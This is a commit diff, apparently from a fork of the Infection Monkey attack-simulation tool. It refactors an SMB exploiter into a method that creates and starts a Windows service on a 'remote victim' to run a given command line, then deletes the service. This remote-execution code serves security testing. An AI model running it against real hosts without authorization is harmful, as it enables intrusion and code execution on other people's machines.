forked from p15670423/monkey
Agent: Extract method _run_agent_on_victim
This commit is contained in:
Kekoa Kaaikala
parent
c3ba2cf6b2
commit
db09fe0cae
|
|
@ -69,37 +69,7 @@ class SMBExploiter(HostExploiter):
|
||||||
|
|
||||||
return self.exploit_result
|
return self.exploit_result
|
||||||
|
|
||||||
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
self._run_agent_on_victim(scmr_rpc, cmdline)
|
||||||
resp = scmr.hROpenSCManagerW(scmr_rpc)
|
|
||||||
sc_handle = resp["lpScHandle"]
|
|
||||||
|
|
||||||
# start the monkey using the SCM
|
|
||||||
try:
|
|
||||||
resp = scmr.hRCreateServiceW(
|
|
||||||
scmr_rpc,
|
|
||||||
sc_handle,
|
|
||||||
SMBExploiter.SMB_SERVICE_NAME,
|
|
||||||
SMBExploiter.SMB_SERVICE_NAME,
|
|
||||||
lpBinaryPathName=cmdline,
|
|
||||||
)
|
|
||||||
except DCERPCSessionError as err:
|
|
||||||
if err.error_code == 0x431:
|
|
||||||
logger.debug(f'SMB service "{SMBExploiter.SMB_SERVICE_NAME}" already exists')
|
|
||||||
resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
|
|
||||||
else:
|
|
||||||
self.exploit_result.error_message = str(err)
|
|
||||||
return self.exploit_result
|
|
||||||
|
|
||||||
service = resp["lpServiceHandle"]
|
|
||||||
try:
|
|
||||||
scmr.hRStartServiceW(scmr_rpc, service)
|
|
||||||
status = ScanStatus.USED
|
|
||||||
except Exception:
|
|
||||||
status = ScanStatus.SCANNED
|
|
||||||
pass
|
|
||||||
self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
|
|
||||||
scmr.hRDeleteService(scmr_rpc, service)
|
|
||||||
scmr.hRCloseServiceHandle(scmr_rpc, service)
|
|
||||||
|
|
||||||
logger.info(
|
logger.info(
|
||||||
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||||
|
|
@ -219,3 +189,35 @@ class SMBExploiter(HostExploiter):
|
||||||
return scmr_rpc
|
return scmr_rpc
|
||||||
|
|
||||||
return None
|
return None
|
||||||
|
|
||||||
|
def _run_agent_on_victim(self, scmr_rpc: DCERPC_v5, cmdline: str):
|
||||||
|
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
||||||
|
resp = scmr.hROpenSCManagerW(scmr_rpc)
|
||||||
|
sc_handle = resp["lpScHandle"]
|
||||||
|
|
||||||
|
try:
|
||||||
|
resp = scmr.hRCreateServiceW(
|
||||||
|
scmr_rpc,
|
||||||
|
sc_handle,
|
||||||
|
SMBExploiter.SMB_SERVICE_NAME,
|
||||||
|
SMBExploiter.SMB_SERVICE_NAME,
|
||||||
|
lpBinaryPathName=cmdline,
|
||||||
|
)
|
||||||
|
except DCERPCSessionError as err:
|
||||||
|
if err.error_code == 0x431:
|
||||||
|
logger.debug(f'SMB service "{SMBExploiter.SMB_SERVICE_NAME}" already exists')
|
||||||
|
resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
|
||||||
|
else:
|
||||||
|
self.exploit_result.error_message = str(err)
|
||||||
|
return self.exploit_result
|
||||||
|
|
||||||
|
service = resp["lpServiceHandle"]
|
||||||
|
try:
|
||||||
|
scmr.hRStartServiceW(scmr_rpc, service)
|
||||||
|
status = ScanStatus.USED
|
||||||
|
except Exception:
|
||||||
|
status = ScanStatus.SCANNED
|
||||||
|
pass
|
||||||
|
self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
|
||||||
|
scmr.hRDeleteService(scmr_rpc, service)
|
||||||
|
scmr.hRCloseServiceHandle(scmr_rpc, service)
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue